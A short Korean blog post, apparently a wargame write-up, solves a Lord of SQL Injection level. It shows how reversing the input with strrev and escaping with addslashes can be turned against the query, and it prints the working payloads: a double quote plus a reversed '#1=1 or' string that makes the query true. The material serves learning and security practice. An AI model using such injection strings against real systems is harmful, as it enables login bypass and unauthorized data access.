strrev함수는 문자열을 뒤집어서 반환하는 함수다. addslashes함수로 싱글쿼터를 입력하면 백슬러시가 추가된다.
id=admin'
을 입력하면 다음과 같이 된다.
이렇게 입력해도 안되는 것을 보니 저 백슬러시를 처리해야 할 것 같다.
?id=nimda&pw= %231=1 ro '
싱글 쿼터랑 백슬러시랑 이것저것 써봤는데 백슬러시를 맞추기가 힘들었다.
대신 더블 쿼터를 쓰면 더블 쿼터 뒤의 백슬러시가 그 뒤의 싱글 쿼터를 문자로 취급하고, and pw='까지 id에 들어가며 or 1=1#를 쿼리로 취급해 문제를 해결할 수 있다.
id="&pw=%23 1=1 ro
id='"\' and pw='or 1=1#
'Web Hacking > LoS' 카테고리의 다른 글
| [Lord of SQL Injection] los nightmare (0) | 2021.08.29 |
|---|---|
| [Lord of SQL Injection] los succubus (0) | 2021.08.15 |
| [Lord of SQL Injection] los assassin (0) | 2021.08.03 |
| [Lord of SQL Injection] los giant (0) | 2021.08.03 |
| [Lord of SQL Injection] los bugbear (0) | 2021.08.01 |